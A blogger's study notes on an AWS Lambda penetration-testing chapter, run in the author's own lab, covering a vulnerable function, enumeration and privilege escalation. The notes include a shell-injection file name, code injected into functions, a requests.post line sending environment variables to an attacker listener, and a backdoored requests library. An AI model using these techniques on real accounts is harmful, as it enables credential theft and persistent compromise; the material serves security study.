Book info – Hands-On AWS Penetration Testing with Kali Linux
Disclaimer: Working through this book will use AWS, which costs money. Make sure you are doing things to manage your costs. If I remember, I’ll keep up with my costs to help get a general idea. But prices can change at any time, so major grain of salt.
Disclaimer #2: Jail is bad. Cybercrime is illegal. Educational purposes. IANAL. Don’t do things you shouldn’t. Etc.
I decided to add this as I finish each chapter in this section (chapters 12-14) because it’s a lot of content, so if the chapter you are looking for isn’t here yet it will be soon. Of course “soon” is a relative term, so if 13 and 14 are as long and dense as 12, it’ll be awhile.
Ch 12 – Security and Pentesting of AWS Lambda
I haven’t used AWS Lambda services, so really looking forward to this chapter – probably going to end up digging through the documentation to get a better handle on what it offers.
When a chapters starts by saying a service is amazing, that sounds to me like there will also be some pretty substantial opportunities for exploitation. AWS Lambda allows for serverless applications and functions. Pricing is pretty typical for AWS (pay for what you use, function can run for a max of 15 min.). The authors also point out that servers are actually involved – you just don’t get to mess with them since one is spun up in isolation to run the function. So you can do quite a bit, but the filesystem is read-only except for the
/tmp directory and you basically have no chance of getting root. And per the authors, if you do manage to get root, AWS would probably like to know about it.
Sounds great in theory, but I was kind of having a “so what” moment with it. The book gave the example of using a Lambda function to do a virus scan on files uploaded to an S3 bucket. That makes sense. And there look to be some automation options available (run off a trigger, take an action depending on outcome, etc.). I’m a fan of automating the things that should be automated, so yay.
Setting up a vulnerable Lambda function
The demo function will inspect contents of files uploaded to an S3 bucket and tag the file accordingly. We’ll intentionally make some coding errors to make it exploitable, so the authors remind you not to put it in production. I will continue doing as I have and only having the exploitable feature available when I’m working on it. It results in a lot of doing/undoing, but I’ve found that helps me internalize the content plus leaving something I know is exploitable exposed just makes me twitchy.
Start by creating an S3 bucket (or you can probably use one of the ones you created in earlier chapters). Everything was left as default, so straightforward creation.
Then pop up the IAM dashboard and create a role to use. It will use the AWS service trusted entity option and the Lambda option. For permissions, give it
AWSLambdaBasicExecutionRole (allows function to push execution logs to CloudWatch, minimum set of permissions for Lambda functions). and
AmazonS3FullAccess (allows way too much interaction with all the S3 things in your account – don’t use this in production, but common and so helpful for demo purposes). Name it something, describe it if desired, and create it.
Now on to the function – go to the Lambda dashboard (it’s under the compute section in the Services menu) and go through “Create function” > “Author from scratch” > Give it a name > Select Python 3.7 as Runtime > Select “Use an existing role” and the role you just created > “Create function”. Look around the dashboard if you want before back to the S3 bucket to create the event trigger.
In the S3 bucket, go to the Properties tab and click on “Events” under “Advanced settings”. Then it’s “Add notification” > Name it > Check the “All object create events” box > Send to Lambda Function > Lambda pick the function just created > Save. Make sure your Events box shows an Active notification now. The trigger should also be there when you refresh the page for your function.
Now add the vulnerable code. This one wasn’t posted to the GitHub for the book for some reason. Just watch your spacing as you put it in. I typed it up in Notepad++ so I could copy/paste in to AWS when I’m working on the exploit.
Attacking Lambda functions with read access
First up – create or adjust a user to use for attacking that you are pretending you have already compromised. It will be set up for read-only Lambda and object-upload S3 access. So create a role with a custom inline IAM policy with actions of
s3:PutObject. Then assign that role to your desired user. The authors say this is a typical example of permissions.
First step in pentesting AWS Lambda is checking the data for all the Lambda functions.
aws lambda list-functions --profile <lambdaprofile> --region <region>
This pulls lots of info about the functions, including the environment variables. The “app_secret” we added is a demo option, but the authors point out you can find all kinds of interesting things in the environment variables portion. If the “Environment” piece isn’t in your output, it’s because there aren’t any.
Next up is checking the code. You can use the list and run each one through
GetFunction to pull the code.
aws lambda get-function --function-name <name> --profile <lambdaprofile> --region <region>
This will return a “Code” piece that will have the info needed to download the code – pull the URL and paste into a browser. It’s a VERY long URL. It will prompt you to download a Zip folder containing the code. Extracting will give us a single file – in practice, this folder may contain multiple files. Next up is static analysis of the code. The coding language was provided in the “Runtime” variable when the
get-function command was run, so you know what language you need to analyze. This analysis is done using Bandit, which is available through
pip. The GitHub install directions were a little different from the book. I used the GitHub directions with the thought they would be the current version:
python3 -m venv bandit-env source bandit-env/bin/activate pip3 install bandit
The virtual envelope is to prevent issues with dependencies. The current Bandit version (June 2020) is 1.6.2 compared to 1.5.1 in the book. I got a syntax error while parsing AST, basically my spacing was off. So I had to fix that. I forget how Python does spacing. Every. Dang. Time. Fix, run again. And get the same errors as the book. Bandit is a static analysis tool, so review for false positives. The first issue was related to the subprocess module, which could be an issue. The second is dealing with the
/tmp/ directory. Could be a problem, but in the context of Lambda it’s not. The third was an issue with the subprocess calling a shell. That would be a problem – it allows injection of shell commands. The book goes into more details about the exploitation info and how to go about it, so be sure to read those parts carefully.
Then comes pulling down the event source mappings. There are none for our demo function, but these provide info about how functions hook into another service.
Next up is looking at the resource policy that shows what can run the function. Pull it down with:
aws lambda get-policy --function-name <name> --profile <lambdaprofile> --region <region>
If you get no response, it indicates there’s not a resource policy. Which means it’s unlikely to be able to run the function unless you happen to have the
lambda:InvokeFunction permission. The one returned in the case of our demo function will show that the function is invoked when an object is uploaded to the S3 bucket.
Putting the pieces together, this means you can upload a file with shell code in the name that will eventually get executed. This can lead to more creds, which can lead to more exploitation. Building the payload for exploitation can be easier if you pull the Lambda function over for testing. This will keep your testing from alerting anyone watching on the AWS account you are targeting. Lambda functions run on an OS with
curl installed. Lots of details about what exactly you are doing and how to do it leads to including an HTTP call in a file name that should be parsed and send creds to a listener set up on your Kali instance. Except it kept identifying the file as not a zip file, so no creds. There is a delay of a couple minutes or so between uploading and the function executing, so be patient. And check the monitoring on the function if you are getting the expected results because the logs will hopefully help you track down the issue.
Make sure the when you enter the function code, you import
import urllib.parse – otherwise the parse portion is not pulled over and you get no where because your file won’t be identified as a zip. Or at least that was what I found to happen. From the GeeksforGeeks summary, it looks like you install with just
urllib but to use the modules you have to import the specific module.
The other likely issue is making sure you enter the Lambda function code correctly and create the file with the correct file name.
NOTE: Make sure you update the IP in your upload if you shutdown and restart your Kali instance. While it’s unlikely you’ll send creds to someone you shouldn’t accidentally, it’s probably best to avoid it altogether.
Once you’ve got it to connect, you have the creds for the role attached to the function. What I find interesting is that the creds pulled are no where that I can find in IAM. Which makes me wonder about auditing on when functions are called and by whom. My CloudWatch logs had the when part, but no the who part. I would imagine there are ways to log this, and I just didn’t set them up when I did the quick CloudWatch and CloudTrail setup in the last chapter. I decided to take 2 seconds and google it. CloudTrail seems to have the activity of interest. I didn’t find exactly what I was looking for, but I do think the info is there and logging can be configured to audit and alert on this type of exploit. If I’m understanding how roles are granted access correctly, the creds you pull in will have a time limit on them since roles have a maximum CLI/API session duration. The authors point out that when the book was written, GuardDuty did not apply to cred exfiltration from Lambda servers, so alerting may be easier said than done.
Using custom test events is recommended for testing how to get input in to the function. Other tips for pentesting lambda functions were check the tags, pulling the function over for testing (likely using the option to download a zip of the entire function), check the CloudWatch logs, formulate payloads to avoid breaking execution of the function because noise, and watch the timeout of the function to maximize ROI.
Sidenote: Something to keep in mind, depending on which version of netcat you have, you may not be able to use certain flags together. The version I have on Kali and my WSL will let you use the
p flags together, but others don’t. Check the man page where you are working to see what flags cannot be used together.
Attacking Lambda functions with read and write access
For this section, we’re operating with
lamdba:* permissions – basically do all the things with Lambda functions. This opens a lot of options for attack. This section is working with the one we just made, so if you didn’t get it working, might want to.
Apparently privilege escalation is relatively easy – that makes me feel good. The first demo for this section will need a user with
iam:ListRoles permissions. Start by pulling down the roles and seeing what roles Lambda can get.
aws iam list-roles --profile <lambdaRWprofile>
See what’s there…maybe even the Admin role you created earlier that you want to delete. Who knows. However, the
LambdaEC2FullAccess role did not. Since we have the option of passing a role, the plan is to exploit it by creating a Lambda function to do what we want. You can create functions using the API, but the demo is with the console. Creds don’t need to be specified because the function will automatically check for environment variables. By using a test event, you can view the execution results even without having the ability to view CloudWatch logs. Running the demo function, I was abler to view the information on associated EC2 instances, so everything worked as expected. This can be further exploited as desired using EC2 permissions.
The next demo is without the
PassRole permission, so no new functions. So back to modifying an existing one. Just be careful because breaking one would be a pretty big oopsie. So you want the additional code to not disrupt the function and place toward the top to increase the likelihood if will be executed. Using
try/except is a good option to prevent throwing errors where they’ll be seen.
This part of the demo just listed S3 buckets:
# Add to existing function with appropriate indentation try: s3 = boto3.client('s3') print(s3.list_buckets()) except: pass
With this scenario, we are presuming we can view the execution logs which requires either CloudWatch access or running test events. And if you run it against a test event (if you are in the console with those permissions), you can check the execution results to see the outcome. You also don’t know the full context of the function, so it would be easy to make an adjustment that would make it deviate from the expected behavior. You can ignore this and hope for the best or modify the payload to exfil creds. Exfiltrating creds is likely the “safer” option. You can do this in a somewhat roundabout way (if you don’t use the option done earlier) via the
requests library. This library can be pulled from the
botocore library which is required for Lambda functions:
from botocore.vendored import requests
You can use this to pull environmental variables or run API calls from the function to exifil output. The latter is apparently safer because it would come from the expected IP, but the environmental variables option will be more versatile and require less overall modification. So I guess it would come down to which you are more comfortable with, maturity level of the entity you are pentesting, and desired outcome. You can use the requests library to send an HTTP post with the variables with a low timeout to avoid bonking things. Then you wait for it to trigger, which in our lab scenario may happen with either a test event or uploading a file to the S3 bucket. The test event works fine, but testing with an S3 bucket is not a bad idea. And make sure you save the Lambda function after you make any changes so it does what you are trying to do.
The key piece is
requests.post('http://<ip>', json=os.environ.copy(), timeout=0.01). That will push the environmental variables to your listener.
This will be similar to priv esc. Lots of options to do this including modifying an existing function and pulling the data it receives, creating a new function to trigger on key events, or modifying an existing function with a payload somewhere discrete. The authors insinuate this is just scratching the surface, so diving more into AWS would help. By changing the
event you can exfiltrate the value in the event parameter. I would demo this one with an S3 upload so you can better see the information available. It will work with the Hello World test event, but it’s more valuable to see what realistic environmental variables look like.
Working with this, I got a pretty important notice in my logs.
/var/runtime/botocore/vendored/requests/api.py:72: DeprecationWarning: You are using the post() function from 'botocore.vendored.requests'. This dependency was removed from Botocore and will be removed from Lambda after 2021/01/30. https://aws.amazon.com/blogs/developer/removing-the-vendored-version-of-requests-from-botocore/. Install the requests package, 'import requests' directly, and use the requests.post() function instead. DeprecationWarning
So it looks like this specific method of exploiting requests will not be an option for much longer.
The authors also pointed out several times you have to watch the timeout amount. You can make the function timeout if you try to pull too much. You can increase the time if you have access, but that can cause billing anomalies that could get you caught.
This won’t be a deep dive because you can use the methods covered earlier. And what persistence means can vary. Think about context and what will work. Consider backdooring multiple Lambda functions for a backup if one gets removed.
Yep, that was short section. And I’m not even mad.
This section was neat. Basically random function in a code going to a random IP is likely going to get noticed if anyone familiar with the code reviews the function. You think? Especially since putting the exploit early is desired so you know it will get triggered. So this section talked about backdooring the dependencies. Super cool. (I’m not a developer/programmer/coder, so I thought this was really cool to get to try. I dabble and script, but not at the depth of many I know.)
If you can’t pull requests from botocore, which you won’t be able to in a few months anyways, you have to include the library along with the code. And that library can be backdoored. Unfortunately when I pulled the function code down, it did not include the requests library. I think for you to get the library when you pull the function code, you would need the library. Amazon provides install directions for how to upload dependencies.
#Pull down requests to directory for function sudo pip3 install requests --target ./<dir> #The def get portion to edit is in the /requests/api.py file cd ./<dir> zip -r9 ./function.zip . # Add lambda function code zip -g ./function.zip ./lambda_function.py # Upload modified code, make sure to use a profile with Lambda write privileges # The fileb:// portion is required but not part of the file path aws lambda update-function-code --function-name <functionName> --zip-file fileb://function.zip --profile <profile>
This got the requests library and dependencies into the function, but my function kept timing out and no connections in Kali. I tested the function in Python to make sure it was working, so it may have been something with how I added the requests library or messing with the function name.
Starting with a “fresh” function, I entered the Python code to import requests and pull a URL. That errored out with the message that the requests library couldn’t be found. Pulled that function down, changed to the parent of that folder, installed requests in the function’s folder, zipped, added the Lambda function, and uploaded. So far, so good. And it failed with a task timed out message again. Bumped it up to 5, and it went through. Pulled it down, made the edits to the
api.py file in the requests library, went through the steps to update the dependencies again, uploaded, and success!
Pivoting into Virtual Private Clouds
Since Lambda functions can be launched into a VPC, you can use them to pivot into an internal network. Depending on access, you could take a Lambda function that launches into a VPC and modify it or create a new one that launches into a VPC. The default for Lambda functions is to run in a default VPC managed by the system. The functions we’ve set up so far have used this option. When launching a function into a VPC, you have to make sure the internet access is configured (the book and the Edit VPC page in the console point this out), so make sure the VPC being used is setup for internet access (has a NAT gateway). This looks like a great way to gain a foothold in an organization’s cloud infrastructure. You have to look at the security group rules to determine how to exploit, but looks interesting. I may try doing this in the VPC I have for my Windows and Ubuntu EC2 instances, but not right now.
My takeaway, Lambda functions have a high likelihood for shenanigans, so make sure you check them out. And if you are setting them, be diligent in following best practices and properly locking them down.
That was a loooooooooooooooooong chapter. Ton of content, very dense. Lots of great information, but I feel like I’ve just scratched the surface of what Lambda functions can do.
Lots of frustration getting the initial vulnerable function working, so I added it to my GitHub.